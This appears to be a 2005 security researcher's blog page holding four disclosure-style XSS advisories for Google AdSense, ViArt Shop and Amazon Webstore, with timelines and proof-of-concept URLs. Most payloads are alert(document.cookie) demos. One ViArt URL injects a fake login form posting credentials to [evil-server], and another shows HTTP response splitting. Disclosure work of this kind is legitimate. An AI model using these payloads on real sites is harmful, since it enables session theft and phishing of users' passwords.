Google AdSense invite-friend multiple field XSS

Sunday, May 01, 2005
####################################################
Google AdSense invite-fiend multiple field XSS
vendor url:https://www.google.com/adsense/
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-invite-friend-multiple.html
vendor notify : yes exploit available:yes
#####################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly ' Your friend's name',' Your name' ,'Your
email address' and 'Add a personal message' fields upon
submission to the 'previewInvitation()' Function in '/adsense/invite-friend'
scripts.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading to a
loss of integrity.

#############
tieline:
#############
discovered: 1 may 2005
vendor notified: 2 may 2005
vendor response: 2 may 2005 ( autoresponder)
vendor response:
fix: not fixed !!!!
disclosure: 5 may 2005

###################
software used
##################

windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1

#################
proof of concept:
#################

Image Example

Go to this address https://www.google.com/adsense/invite-friend
ans insert in fields listed for example:
"><iframe src=http://www.google.com><iframe>
and click in 'preview invite text' link , the iframe is executed
in the texarea on show a preview of the invite with this we can
exploit ' Your friend's name',' Your name' ,'Your email address'
and 'Add a personal message' form fields.

WARNING !!! IF WE LOOK WE ARE IN HTTPS PROTOCOL !!!!!!

(Yet another) Google Cross Site Scripting

############### End ####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.

Google Adsense multiple variable XSS

Saturday, April 30, 2005
#####################################################
Google Adsense multiple variable XSS
vendor url:https://www.google.com/adsense/?hl=en_US
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-multiple-variable-xss.html
vendor notify: yes exploit available: yes
######################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly 'client' , 'hl' , 'client' , 'adU', 'adT',
'exp' and 'done' variables upon submission to the 'pagead/ads'
and 'feedback/abg' scripts.This could allow a user to create a
specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and the
server,leading to a loss of integrity.

#########
solution:
##########

Aparently all are pached !!!

#############
timeline:
#############

discovered: 28 april 2005
vendor notified: 29 april 2005
vendor response: 29 april 2005 (autoresponder)
vendor response: 30 april 2005 (email)
fix: 30 april 2005
disclosure: 1 may 2005

#################
proof of concept:
#################
I try the ad´s show in Bandaancha.st because
i like the information provide by this web :DDDD
--

###################
software used
##################
windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1
--
in this case the ad´s displayed are "tipical" related shopping carts
--

http://pagead2.googlesyndication.com/pagead/ads?client=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3Eca-pub-701951298956
4856&dt=1114800478343&lmt=1114800477&format=fp_al_lp
&output=html&channel=8235212864&url=http%3A%2F%2Fwww
.soft32.com%2Fdow nload-publisher-80337-3.html&ref=http%3A%2F
%2Fwww.soft32.com%2Fdownload_80337.html&u_h=768&u_w=
1024&u_ah=740&u_aw=1024&u_cd=32&u_tz=120&u_his
=4&u_java=true&u_nplug=25&u_nmime=93&kw_type=broad
&prev_fmts=180x90_0ads_al_s&rt=ChBCcoJ7AAm3zAoSZDJjsh4zEhl
GcmVlIFBheVBhbCBTaG9wcGluZyBDYXJ0Ggj8cRRPG6sWqA&hl=en

diferent variables afected.

'hl' , 'client' , 'adU', 'adT', 'exp' and ' 'done' aparently afected.

http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl="><strong><h1>Lostmon
_was_here!!</h1></strong>es&client=ca-pub-42070770121
30458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=Marketingy
Comercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.
com&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaan
cha.st/index.php&hl=es&client="><strong><h1>
;Lostmon_was_here!!!</h1></strong>ca-pub-4207077012
130458&adU=www.abeltronica.com&adT=Prueba+Gratis+su+Internet&ad
U=www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyCom
ercio.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.co
m&adT=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU="
><strong><h1>Lostmon_was_here!!!</h1></s
trong>www.abeltronica.com&adT=Prueba+Gratis+su+Internet&adU=w
ww.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerci
o.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&adT
=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


http://services.google.com/feedback/abg?url=http://www.bandaanc
ha.st/index.php&hl=es&client=ca-pub-4207077012130458&adU=www.ab
eltronica.com&adT="><strong><h1>Lostmon_was
_here!!</h1></strong>Prueba+Gratis+su+Internet&adU=
www.adslwanadoo.com&adT=ADSL+alta+velocidad&adU=MarketingyComerc
io.com/_adsl&adT=Adsl:+compare+ofertas&adU=www.top4search.com&ad
T=Adsl+-+Todas+las+ofertas&exp=Ads+by+Goooooooogle&done=1


(Yet another) Google Cross Site Scripting

################ End #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org

ViArt Shop Enterprise multiple variable XSS

Friday, April 29, 2005
#########################################################
ViArt Shop Enterprise multiple variable XSS
vendor: http://www.codetosell.com
advisory:http://lostmon.blogspot.com/2005/04/
viart-shop-enterprise-multiple.html
vendor informed: yes exploit available:yes
OSVDB ID:15951, 15952 ,15953, 15954 , 15955 , 15956 , 15957, 15958
Securitytracker:1013853
Secunia:SA15181
BID:13462
#########################################################

ViArt Shop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple variables upon submission to the multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.

##########
versions:
##########

ViArt Shop Enterprise v.2.1.6 afected
also is posible prior versions are afected too.

##########
Solution:
##########

Update to version ViArt Shop version 2.1.8

#########
timeline:
#########

discovered : 25 april 2005
vendor notify :28 april 2005
vendor response :18-10-2005
vendor fix:05-05-2005
disclosure:29 april 2005

########## Proof of concept ##############
############
basket.php
###########

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0
[XSS-CODE]%26search_string%3Dss%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3D[XSS-CODE]%26search_string%3Dss%26
search_category_id%3D%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id
%3D0%26search_string%3Dss%26search_string%3Dss%26
search_category_id[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26
search_category_id%3D[XSS-CODE]%26search_category_id%3D

http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26search_category_id%3D
%26search_category_id%3D[XSS-CODE]

###########
forum.php
###########

http://[victim]/forum_new_thread.php

form fields nickname,email,topic and message are vulnerables to XSS

for exploiting email you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com

http://[victim]/forum_thread.php?thread_id=2

wen reply to a post nickname and message fields are vulnerable to XSS

all of this codes are executed wen a user view the forum or wen admin
look in "admin panel" for "forum threads" in forum menu

###########
page.php
###########

http://[victim]/page.php?page=about%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send
%20to%20webmaster,%20please%20insert%20your%20username%20
and%20password%20,%20and%20continue%20shopping%20%3Cform
%20action=%22http://[evil-server]/save.php%22%20method=%22
post%22%3EUsername:%3Cinput%20aame=%22username%22%20type
=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3C
input%20name=%22password%22%20type=%22text%22%20maxlength
=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=
%22submit%22%20value=%22Login%22%3E%3C/form%3E


############
reviews.php
############

http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4

http://[victim]/reviews.php?filter=0&item_id=4
[XSS-CODE]&category_id=0

#################
products.php
#################

http://[victim]/product_details.php?item_id=4
&category_id=0[XSS-CODE]


http://[victim]/products.php?category_id=13[XSS-CODE]

http://[victim]/products.php?category_id=0&search_string=
[XSS-CODE]&search_category_id=

##################
news_view.php
##################

http://[victim]/news_view.php?news_id=3&rp=
news.php[XSS-CODE]&page=1

http://[victim]/news_view.php?news_id=3&rp=
news.php&page=1[XSS-CODE]

################# end #########################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.

Amazon webstore script injection and XSS

Thursday, April 28, 2005
#########################################################
Amazon webstore script injection and XSS
vendor:http://scripts.justwilliams.com/amazon/index.htm
advisory:http://lostmon.blogspot.com/2005/04/
amazon-webstore-script-injection-and.html
vendor informed: yes exploit available:yes
OSVDB ID:15892 , 15893 and 15894
Secunia: SA15155
BID: 13419 , 13425, 13426 , 13427 , 13428
Securitytracker:1013836
#########################################################


Amazon Webstore is a project that is currently being developed
at JustWilliam's. It is written in PHP and is designed to interface
with Amazon's vast database of products

Amazon Webstore contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' or 'currentIsExpanded''searchFor'and 'currentNumber'
upon submission to the 'index.php'and 'closeup.php' scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.


##########
versions:
##########

Amazon Webstore Version 04050100

also is posible prior versions are afected.
#########
Solution:
#########

no solution at this time

##########
timeline:
##########

discovered: 25 april 2005
vendor notify: 26 april 2005
vendor response:
vendor fix:
disclosure:28 april 2005

##########
exploits :
##########

http://[victim]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm

and server respose with this cookie :

ourhistory[uk]
a%3A1%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7B
s%3A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+
-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
2981060096
29706949
933228160
29706915
*
them if we try to inject a malicious javascript it is execute
everytime what we navigate on a link of the page.

http://[victim]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm

and server respond with cookie:

ourhistory[uk]
a%3A1%3A%7Bs%3A56%3A%22asin-%0D%0ASet-Cookie%3A
+HTTP_response_splitting%3DYES%0D%0AFoo%3A+bar%22%
3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A20%3A%22-+No
+product+found+-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
1656289024
29706956
995487088
29706922
*

if we inject first url and after the second the server set this cookie:

ourhistory[uk]
a%3A3%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7Bs%3
A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+-%22%3
Bs%3A1%3A%22i%22%3BN%3B%7Ds%3A15%3A%22asin-B00004UAFX
%22%3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A17%3A%22Story+
Book+Weaver%22%3Bs%3A1%3A%22i%22%3Bs%3A63%3A%22http%3
A%2F%2localhost%2Fimages%2FP%2FB00004UAFX.02.THUMBZZ
localhost/
1536
1656289024
29706956
995487088
29706922
*
######################
XX on others scripts
######################


http://[victim]/closeup.php?image=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E


http://[victim]/index.php?currentIsExpanded=0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E¤tNumber=8

http://[victim]/index.php?function=search&searchFor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


http://[victim]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E¤tIsExpanded=0

http://[victim]/index.php?country=uk
&function=search&searchFor='%20';!--%22%3CCSS_Check%3E=&{()}
&goButton=go&mode=books

is posible to others scripts are vulnerables too

################# End ###################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends